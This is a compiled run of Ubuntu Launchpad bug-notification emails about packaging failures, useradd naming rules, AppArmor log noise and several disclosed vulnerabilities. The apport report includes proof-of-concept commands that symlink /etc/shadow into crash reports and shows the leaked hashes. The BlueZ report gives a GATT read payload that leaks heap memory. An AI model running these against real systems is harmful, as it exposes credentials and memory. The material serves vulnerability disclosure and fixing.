  ProcVersionSignature: Ubuntu 5.4.0-77.86-generic 5.4.119
  Uname: Linux 5.4.0-77-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.18
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Wed Jul 21 19:16:15 2021
  ErrorMessage: installed initramfs-tools package post-installation script subprocess returned error exit status 1
  InstallationDate: Installed on 2018-07-28 (1089 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.10, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.6
  SourcePackage: initramfs-tools
  Title: package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade: installed initramfs-tools package post-installation script subprocess returned error exit status 1
  UpgradeStatus: Upgraded to focal on 2020-10-05 (288 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1937071/+subscriptions




[Touch-packages] [Bug 1937071] Re: package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade: installed initramfs-tools package post-installation script subprocess returned error exit status 1

2021-07-21 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1937071

Title:
  package initramfs-tools 0.136ubuntu6.6 failed to install/upgrade:
  installed initramfs-tools package post-installation script subprocess
  returned error exit status 1

Status in initramfs-tools package in Ubuntu:
  New



[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-07-07 Thread Seth Arnold
Beautiful, thanks for the large range of tests :)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New

Bug description:
  [Description]

  Fully numeric names support in Ubuntu is inconsistent in Focal onwards
  because systemd does not like them[1] but are still allowed by default
  by useradd, leaving the session behavior in hands of the running
  applications. Two examples:

  1. After creating a user named "0", the user can log in via ssh or
  console but loginctl won't create a session for it:

  root@focal:/home/ubuntu# useradd -m 0
  root@focal:/home/ubuntu# id 0
  uid=1005(0) gid=1005(0) groups=1005(0)

  ..

  0@192.168.122.6's password:
  Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

  Last login: Thu Apr  8 16:17:06 2021 from 192.168.122.1
  $ loginctl
  No sessions.
  $ w
   16:20:09 up 4 min,  1 user,  load average: 0.03, 0.14, 0.08
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  0        pts/0    192.168.122.1    16:17    0.00s  0.00s  0.00s w

  And pam-systemd shows the following message:

  Apr 08 16:17:06 focal sshd[1584]: pam_unix(sshd:session): session opened for user 0 by (uid=0)
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): pam-systemd initializing
  Apr 08 16:17:06 focal sshd[1584]: pam_systemd(sshd:session): Failed to get user record: Invalid argument

  2. With that same username, every successful authentication in gdm will loop back to gdm again instead of starting gnome, making the user unable to log in.

  Making useradd fail (unless --badnames is set) when a fully numeric name is used will make the default OS behavior consistent.

  [Other info]

  - Upstream does not support fully numeric usernames
  - useradd has a --badnames parameter that would still allow the use of these types of names

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1927078/+subscriptions



[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-06-17 Thread Seth Arnold
Ah, that explains that.

Would you mind adding tests for a few more usernames?

0root
0
00
0.0
0x0
0-0
0_0
0.o
0xo
0-o
0_o

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New



[Touch-packages] [Bug 1932342] Re: Feature Request: Rate limit apparmor denial logs

2021-06-17 Thread Seth Arnold
See also https://github.com/snapcrafters/discord/issues/23 -- there may
be some other advice buried in there on how to deal with the deluge
while also not giving discord permission to see all the processes you're
running.

Thanks

** Bug watch added: github.com/snapcrafters/discord/issues #23
   https://github.com/snapcrafters/discord/issues/23

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1932342

Title:
  Feature Request: Rate limit apparmor denial logs

Status in apparmor package in Ubuntu:
  Confirmed

Bug description:
  While running Discord, AppArmor prints a ton of denials every second.
  The lines look something like this:

  > Jun 17 18:00:14 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"

  I'm thankful that AppArmor is preventing it from using pthread to mess
  with my system. However, I wish it didn't spam my logs so much. Would
  it be possible to implement a system whereby subsequent identical logs
  within the same second are deduplicated? For example, instead of 127
  separate denials lines, one second could look like this:

  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/1383/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [3 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/1407/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [48 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="snap.snap-store.ubuntu-software"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [15 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="docker-default"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/14296/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [8 identical messages omitted]
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="open" profile="snap.discord.discord" name="/proc/93917/cmdline" pid=267198 comm="Discord" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" operation="ptrace" profile="snap.discord.discord" pid=267198 comm="Discord" requested_mask="read" denied_mask="read" peer="unconfined"
  > Jun 17 18:02:29 magni audit[267198]: AVC apparmor="DENIED" [40 identical messages omitted]

  Of course, it would've been nice if Discord wasn't persistently trying
  to ptrace everything on my system all the time even after being
  denied, but AppArmor exists to deal with misbehaving applications, so
  we kinda have to expect that the applications it deals with will be
  misbehaving.

  ProblemType: Bug
  DistroRelease: Ubuntu 21.04
  Package: apparmor 3.0.0-0ubuntu7
  ProcVersionSignature: Ubuntu 5.11.0-18.19-generic 5.11.17
  Uname: Linux 5.11.0-18-generic x86_64
  

[Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-06-16 Thread Seth Arnold
Heh, a comment in Jawn's debdiff:

 * User/group names must match [a-z_][a-z0-9_-]*[$]

I found period also worked fine:

root@u20:~# useradd 0.0
root@u20:~# getent passwd 0.0
0.0:x:1001:1001::/home/0.0:/bin/sh
root@u20:~# userdel 0.0
root@u20:~# getent passwd 0.0
root@u20:~# exit

I know comments are almost always out of date by the time I read them,
but this one seems wronger than usual. :)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New



Re: [Touch-packages] [Bug 1927078] Re: Don't allow useradd to use fully numeric names

2021-06-16 Thread Seth Arnold
On Wed, Jun 16, 2021 at 09:15:32PM -, Steve Langasek wrote:
> Disallowing leading numeric digits entirely would, unfortunately,
> disable a significant class of valid usernames in conflict with
> historical usage.

Admins are still able to hand-edit /etc/passwd, /etc/shadow, and mv
home directory names if they've got a good enough reason to use such
names and trust their software to do the right thing.

> The main motivation in fixing this is that allowing fully-numeric
> usernames means there is ambiguity in contexts that can reference both
> uids and usernames and do not have strong typing.  Aside from systemd,
> this is mostly about shells and invocations of various commandline
> tools; and neither bash nor the tools appear to interpret 0o0 or 0x0 as
> numbers:

I was thinking primarily of perl, here:

$ sudo perl -e 'print "muahaa\n" if $< == "0x0";'
muahaa

You could argue that wherever "0x0" came from in this perl program should
have kept track if it received a number or a name, but the language sure
doesn't help.

C examples are less compelling because it has types but the atoi(3)
and strtoul(3) APIs make it very easy to parse something like "2build"
or "4fun" or "0x0" into an integer. (strtol(3) has a nice example.)

> Let's please focus on the known problem case of all-numeric usernames.
> If there are other confirmed security issues with octal/hex
> representations of numbers, then we should also close those, but it
> needs a more precise fix than disabling leading digits.

How strongly do you feel about this? I can see where you're coming from,
but given (a) the escape hatch mechanism to 'break the rules' isn't too
onerous (b) the ease with which brittle code can be written (c) the
simplicity of 'deny leading digit' compared against 'make sure there's at
least one non-digit' or 'make sure there's at least one letter' etc I
prefer the simpler rule.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/1927078

Title:
  Don't allow useradd to use fully numeric names

Status in shadow package in Ubuntu:
  New
Status in shadow source package in Focal:
  New
Status in shadow source package in Groovy:
  New
Status in shadow source package in Hirsute:
  New
Status in shadow source package in Impish:
  New

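
The numeric-parsing ambiguity raised in the 2021-06-16 message above, run over the test usernames requested in the 2021-06-17 message, as an added C example (not code from shadow, systemd or the thread). The two rule functions are hypothetical names for the two positions in the thread ("at least one non-digit" versus "deny leading digit"); they check only the numeric aspect, not the full useradd character policy.

```c
#include <ctype.h>
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>

/* atoi(3) as brittle code tends to use it: no error reporting at all. */
int lenient_atoi(const char *s) { return atoi(s); }

/* strtoul(3) with base 0 and the end pointer ignored: also takes 0x.. / 0.. */
unsigned long lenient_strtoul(const char *s) { return strtoul(s, NULL, 0); }

/* True when strtoul consumed at least one character, i.e. code that skips
 * the "whole string was a number" check would take the name for a uid. */
bool lenient_reads_as_uid(const char *name, unsigned long *uid)
{
    char *end;
    *uid = strtoul(name, &end, 0);
    return end != name;
}

/* Strict parse: the whole string must be decimal digits and fit the type. */
bool strict_uid(const char *s, unsigned long *uid)
{
    char *end;
    if (!isdigit((unsigned char)s[0]))
        return false;                 /* "", "-1", "+1", " 1", "root" */
    errno = 0;
    *uid = strtoul(s, &end, 10);
    return errno != ERANGE && *end == '\0';
}

/* Hypothetical rule A: reject only names made up entirely of digits. */
bool rule_deny_all_numeric(const char *name)
{
    if (*name == '\0')
        return false;
    for (const char *p = name; *p; p++)
        if (!isdigit((unsigned char)*p))
            return true;
    return false;
}

/* Hypothetical rule B: reject any name that starts with a digit. */
bool rule_deny_leading_digit(const char *name)
{
    return *name != '\0' && !isdigit((unsigned char)name[0]);
}

typedef bool (*name_rule)(const char *);

/* Constructed sample: the test names requested in the thread plus the
 * "2build" and "4fun" names mentioned alongside atoi/strtoul. */
static const char *const SAMPLE_NAMES[] = {
    "0root", "0", "00", "0.0", "0x0", "0-0", "0_0",
    "0.o", "0xo", "0-o", "0_o", "2build", "4fun",
};
enum { SAMPLE_COUNT = sizeof SAMPLE_NAMES / sizeof SAMPLE_NAMES[0] };

/* Names the rule lets through that a lenient parser still reads as a uid. */
int count_accepted_but_numeric(name_rule rule)
{
    int n = 0;
    for (int i = 0; i < SAMPLE_COUNT; i++) {
        unsigned long uid;
        if (rule(SAMPLE_NAMES[i]) &&
            lenient_reads_as_uid(SAMPLE_NAMES[i], &uid))
            n++;
    }
    return n;
}

int main(void)
{
    printf("%-8s %5s %8s %7s %6s %6s\n",
           "name", "atoi", "strtoul", "strict", "ruleA", "ruleB");
    for (int i = 0; i < SAMPLE_COUNT; i++) {
        const char *s = SAMPLE_NAMES[i];
        unsigned long uid;
        printf("%-8s %5d %8lu %7s %6s %6s\n", s, lenient_atoi(s),
               lenient_strtoul(s), strict_uid(s, &uid) ? "uid" : "name",
               rule_deny_all_numeric(s) ? "allow" : "deny",
               rule_deny_leading_digit(s) ? "allow" : "deny");
    }
    printf("rule A lets through %d uid-like names, rule B %d\n",
           count_accepted_but_numeric(rule_deny_all_numeric),
           count_accepted_but_numeric(rule_deny_leading_digit));
    return 0;
}
```

Callers that accept "uid or name" in one argument need the `strict_uid` style of check regardless of which naming rule is enforced, since names created before the rule or with `--badnames` can still exist.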


[Touch-packages] [Bug 1917904] Re: Arbitrary file reads

2021-06-11 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1917904

Title:
  Arbitrary file reads

Status in apport package in Ubuntu:
  Fix Released
Status in apport source package in Bionic:
  Fix Released
Status in openjdk-lts source package in Bionic:
  New
Status in apport source package in Focal:
  Fix Released
Status in openjdk-lts source package in Focal:
  New
Status in apport source package in Groovy:
  Fix Released
Status in openjdk-lts source package in Groovy:
  New
Status in apport source package in Hirsute:
  Fix Released
Status in openjdk-lts source package in Hirsute:
  New
Status in apport source package in Impish:
  Fix Released
Status in openjdk-lts source package in Impish:
  New

Bug description:
  # Vulnerabilities in Apport
  During a cursory code review, several potential security issues in `apport` and crash-related hooks in packages such as `Xorg` and `openjdk-14-lts` have been identified.

  While the issue regarding the `openjdk-14-lts` package is exploitable on default installations, the remaining issues most likely are mitigated by the sysctl setting `fs.protected_symlinks` on default Ubuntu installations.

  With regard to issues mitigated by `fs.protected_symlinks`, it is not
  clear if they are considered to be part of the threat model, but
  nonetheless will be included in this report. Further, if the issues
  regarding package hooks should be reported in the corresponding
  packages' bug tracker, please let me know.

  ## Issue 1: Arbitrary file read in package-hooks/source_openjdk-*.py
  The `add_info()` function allows for a directory traversal by building a file path using user-controlled data without properly sanitizing the resulting path.

  ```Python
  def add_info(report, ui=None):
      if report['ProblemType'] == 'Crash' and 'ProcCwd' in report:
          # attach hs_err_.pid file
          cwd = report['ProcCwd']
          pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
          if pid_line:
              pid = pid_line.groups()[0]
              path = "%s/hs_err_pid%s.log" % (cwd, pid)
              # make sure if exists
              if os.path.exists(path):
                  content = read_file(path)
                  # truncate if bigger than 100 KB
                  # see LP: #1696814
                  max_length = 100*1024
                  if sys.getsizeof(content) < max_length:
                      report['HotspotError'] = content
                      report['Tags'] += ' openjdk-hs-err'
                  else:
                      report['HotspotError'] = content[:max_length] + \
                          "\n[truncated by openjdk-11 apport hook]" + \
                          "\n[max log size is %s, file size was %s]" % \
                          (si_units(max_length), si_units(sys.getsizeof(content)))
                      report['Tags'] += ' openjdk-hs-err'
  ```

  By injecting a `ProcCwd` such as `/home/user/` and a `Pid` such as
  `0`, the function includes an arbitrary file by following a potential
  symbolic link `/home/user/hs_err_pid0.log`.

  ### PoC
  ```
  $ sudo apt install openjdk-14-jdk

  $ sudo sysctl fs.protected_symlinks
  fs.protected_symlinks = 1

  $ ln -s /etc/shadow /home/user/hs_err_pid0.log

  $ pid=$'\t0';cat << EOF > /var/crash/poc.crash
  ProblemType: Crash
  ExecutablePath: /poc
  Package: openjdk-lts 123
  SourcePackage: openjdk-lts
  ProcCwd: /home/user
  ProcStatus:
   Pid:$pid
   Uid:$pid
  EOF

  $ grep -A3 root: /var/crash/poc.crash
   root:!:18393:0:9:7:::
   daemon:*:18375:0:9:7:::
   bin:*:18375:0:9:7:::
   sys:*:18375:0:9:7:::
  ```

  ## Issue 2: Arbitrary file read in package-hooks/source_xorg.py (Info)
  The root cause of this issue stems from the fact that a potentially user-controlled file in the `/tmp` directory is not checked for being a symbolic link and therefore might allow including arbitrary files in the processed crash report:

  Note: Requires `fs.protected_symlinks=0`

  ```Python
  def attach_3d_info(report, ui=None):
      ...

      # Compiz internal state if compiz crashed
      if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
          compiz_pid = 0
          pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"])
          if pid_line:
              compiz_pid = pid_line.groups()[0]
          compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid
          attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
  ```

  ### PoC
  ```
  $ sudo sysctl fs.protected_symlinks=0
  fs.protected_symlinks = 0

  $ ln -s /etc/shadow /tmp/compiz_internal_state0

  $ cat << EOF > /var/crash/poc.crash
  ProblemType: Crash
  ExecutablePath: /poc
  Package: source_xorg 123
  SourcePackage: compiz
  

[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage

2021-06-09 Thread Seth Arnold
Wonderful, thanks Daniel!

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information
  leakage

Status in Bluez Utilities:
  Fix Released
Status in bluez package in Ubuntu:
  Fix Released
Status in bluez source package in Hirsute:
  Fix Released
Status in bluez source package in Impish:
  Fix Released

Bug description:
  I installed the latest bluez 5.53-0ubuntu3 version using apt-get install. It seems that this vulnerability was silently fixed in the latest bluez5.8, and the cve number was not assigned.
  But this vulnerability now affects the latest ubuntu system
  This vulnerability allows an attacker to remotely obtain most of the contents of the heap without authentication.
  The vulnerability code is stored in cli_feat_read_cb, this function does not verify the offset parameter
  The vulnerability code is as follows

  gatt-database.c

  1054:static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
                                    unsigned int id, uint16_t offset,
                                    uint8_t opcode, struct bt_att *att,
                                    void *user_data){
  ...
          len = sizeof(state->cli_feat)-offset;
          value = len? &state->cli_feat[offset]: NULL;

  done:
          gatt_db_attribute_read_result(attrib, id, ecode, value, len);

  }
  len will become very large due to integer overflow, so that a message of mtu (0x90) size will be sent later
  The message content is the buffer pointed to by value, which can be most addresses on the heap

  poc is very simple, the core is this line of code

  memcpy([0],"\x0c\x0b\x00\x0d\x00",5);

  0xc stands for read
  \x0b\x00 represents the handle of the client feature, which can be obtained through the find info message, which seems to be 0b by default
  \x0d\x00 is offset 0xd

  this vulnerability is serious
  I want to apply for a cve number, although this has been silently fixed in the latest version

To manage notifications about this bug go to:
https://bugs.launchpad.net/bluez/+bug/1926548/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
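
The length computation from the report above, modelled stand-alone beside a bounds-checked variant. This is an added example, not code from the bug report or from BlueZ; the 1-byte array size, the size_t type of len, the struct and function names, and the choice to reject only offsets greater than the array size are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumptions for this model: a 1-byte feature array and a size_t length. */
#define CLI_FEAT_SIZE 1
#define ATT_ERROR_INVALID_OFFSET 0x07	/* ATT error code "Invalid Offset" */

struct state_model {
	uint8_t cli_feat[CLI_FEAT_SIZE];
};

struct read_result {
	uint8_t ecode;		/* 0 on success, ATT error code otherwise */
	const uint8_t *value;	/* NULL when nothing is returned */
	size_t len;
};

/* Constructed sample state, used by main() below. */
static const struct state_model sample_state = { { 0x01 } };

/*
 * Length exactly as computed in the reported code: offset is not checked.
 * sizeof() yields size_t, so an offset larger than the array wraps around
 * to a value close to SIZE_MAX instead of going negative.
 */
static size_t unchecked_len(const struct state_model *state, uint16_t offset)
{
	return sizeof(state->cli_feat) - offset;
}

/*
 * A Read Response carries at most ATT_MTU - 1 value bytes, so the wrapped
 * length is clamped to that and the reply is filled from memory that lies
 * past the feature array.
 */
static size_t response_payload_len(size_t len, uint16_t mtu)
{
	size_t max = (size_t)mtu - 1;

	return len < max ? len : max;
}

/*
 * Bounds-checked variant: an offset beyond the end of the attribute value
 * is answered with Invalid Offset before any length or pointer is derived
 * from it. An offset equal to the size yields an empty value.
 */
static struct read_result checked_read(const struct state_model *state,
							uint16_t offset)
{
	struct read_result r = { 0, NULL, 0 };

	if (offset > sizeof(state->cli_feat)) {
		r.ecode = ATT_ERROR_INVALID_OFFSET;
		return r;
	}

	r.len = sizeof(state->cli_feat) - offset;
	r.value = r.len ? &state->cli_feat[offset] : NULL;
	return r;
}

int main(void)
{
	uint16_t offset = 0x0d;	/* offset value named in the report */
	uint16_t mtu = 0x90;	/* MTU value named in the report */
	size_t len = unchecked_len(&sample_state, offset);
	struct read_result r = checked_read(&sample_state, offset);

	printf("unchecked: len=%zu, value bytes in reply=%zu\n",
				len, response_payload_len(len, mtu));
	printf("checked:   ecode=0x%02x, len=%zu\n", (unsigned)r.ecode, r.len);
	return 0;
}
```
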


[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage

2021-06-09 Thread Seth Arnold
Daniel, are you sure about that fixed-in-5.56 bug tag? I can't spot the
referenced commit in the tarballs 5.55, 5.56, 5.57, 5.58 from:
http://www.bluez.org/

nor in the github sources:
https://github.com/bluez/bluez/blob/master/src/gatt-database.c#L1054

nor the kernel.org sources:
https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/src/gatt-database.c#n1054

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information
  leakage

Status in Bluez Utilities:
  Fix Released
Status in bluez package in Ubuntu:
  Fix Released
Status in bluez source package in Hirsute:
  Fix Released
Status in bluez source package in Impish:
  Fix Released

To manage notifications about this bug go to:
https://bugs.launchpad.net/bluez/+bug/1926548/+subscriptions



[Touch-packages] [Bug 1926548] Re: The gatt protocol has out-of-bounds read that leads to information leakage

2021-06-08 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to bluez in Ubuntu.
https://bugs.launchpad.net/bugs/1926548

Title:
  The gatt protocol has out-of-bounds read that leads to information
  leakage

Status in bluez package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1926548/+subscriptions



[Touch-packages] [Bug 1930286] Re: Defensics' synopsys fuzzer testing tool cause openssh to segfault

2021-06-02 Thread Seth Arnold
Hello Eric, thanks for doing the research on this issue.

Does the coredump look like this may be exploitable in some fashion?

Is the crash something that affects anything beyond the specific process
serving the client in question?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1930286

Title:
  Defensics' synopsys fuzzer testing tool cause openssh to segfault

Status in openssh package in Ubuntu:
  New
Status in openssh source package in Xenial:
  New

Bug description:
  Here's what has been brought to my attention by a UA customer:

  * Release:
  Xenial/16.04LTS

  * Openssh version:
  7.2p2-4ubuntu2.10

  * Fuzzer tool used:
  https://www.synopsys.com/software-integrity/security-testing/fuzz-testing.html (proprietary software)

  As of today, I have no access to a reproducer. Still working on
  getting access to one (if possible) in order to better understand what
  the failing test scenario is doing.

  * coredump:

  $ gdb $(which sshd) core.cic-1.domain.tld.1612566260.sshd.20731
  ...
  Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
  Core was generated by `sshd: [net] '.
  Program terminated with signal SIGSEGV, Segmentation fault.
  #0 __memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136
  136 ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S: No such file or directory.
  (gdb) bt
  #0 __memcpy_avx_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-avx-unaligned.S:136
  #1 0x7fec25b241db in memcpy (__len=, __src=0x0, __dest=)
      at /usr/include/x86_64-linux-gnu/bits/string3.h:53
  #2 aes_gcm_ctrl (c=0x558a7ae19758, type=, arg=, ptr=0x0) at e_aes.c:1189
  #3 0x7fec25b20897 in EVP_CIPHER_CTX_ctrl (ctx=ctx@entry=0x558a7ae19758, type=type@entry=18, arg=arg@entry=-1, ptr=ptr@entry=0x0) at evp_enc.c:619
  #4 0x558a7953f54c in cipher_init (cc=cc@entry=0x558a7ae19750, cipher=0x558a797b3ef0 , key=0x0, keylen=32, iv=0x0, ivlen=, do_encrypt=0) at ../cipher.c:336
  #5 0x558a7954521a in ssh_set_newkeys (ssh=ssh@entry=0x558a7ae18ef0, mode=mode@entry=0) at ../packet.c:919
  #6 0x558a7955ae92 in kex_input_newkeys (type=, seq=, ctxt=0x558a7ae18ef0) at ../kex.c:434
  #7 0x558a7954d269 in ssh_dispatch_run (ssh=ssh@entry=0x558a7ae18ef0, mode=0, done=0x558a7ae18278, ctxt=0x558a7ae18ef0) at ../dispatch.c:119
  #8 0x558a7954d2b9 in ssh_dispatch_run_fatal (ssh=0x558a7ae18ef0, mode=, done=, ctxt=) at ../dispatch.c:140
  #9 0x558a79502770 in do_ssh2_kex () at ../sshd.c:2744
  #10 main (ac=, av=) at ../sshd.c:2301
  (gdb)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1930286/+subscriptions



[Touch-packages] [Bug 1930301] Re: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1

2021-06-01 Thread Seth Arnold
** Also affects: debconf (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1930301

Title:
  package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade:
  installed libpam0g:amd64 package post-installation script subprocess
  returned error exit status 1

Status in debconf package in Ubuntu:
  New
Status in pam package in Ubuntu:
  New

Bug description:
  My laptop system continuously pops the message system crashed

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libpam0g:amd64 1.3.1-5ubuntu4.2
  ProcVersionSignature: Ubuntu 5.8.0-53.60~20.04.1-generic 5.8.18
  Uname: Linux 5.8.0-53-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.18
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Mon May 31 22:05:36 2021
  DuplicateSignature:
   package:libpam0g:amd64:1.3.1-5ubuntu4.2
   Setting up libpam0g:amd64 (1.3.1-5ubuntu4.2) ...
   debconf: DbDriver "config": /var/cache/debconf/config.dat is locked by another process: Resource temporarily unavailable
   dpkg: error processing package libpam0g:amd64 (--configure):
    installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1
  ErrorMessage: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1
  InstallationDate: Installed on 2020-08-08 (296 days ago)
  InstallationMedia: Ubuntu 20.04.1 LTS "Focal Fossa" - Release amd64 (20200731)
  Python3Details: /usr/bin/python3.8, Python 3.8.5, python3-minimal, 3.8.2-0ubuntu2
  PythonDetails: /usr/bin/python2.7, Python 2.7.18, python-is-python2, 2.7.17-4
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: pam
  Title: package libpam0g:amd64 1.3.1-5ubuntu4.2 failed to install/upgrade: installed libpam0g:amd64 package post-installation script subprocess returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1930301/+subscriptions



[Touch-packages] [Bug 1930209] Re: Could not open file /var/lib/update-notifier/package-data- downloads/partial/verdan32.exe - open (40: Too many levels of symbolic links)

2021-06-01 Thread Seth Arnold
** Summary changed:

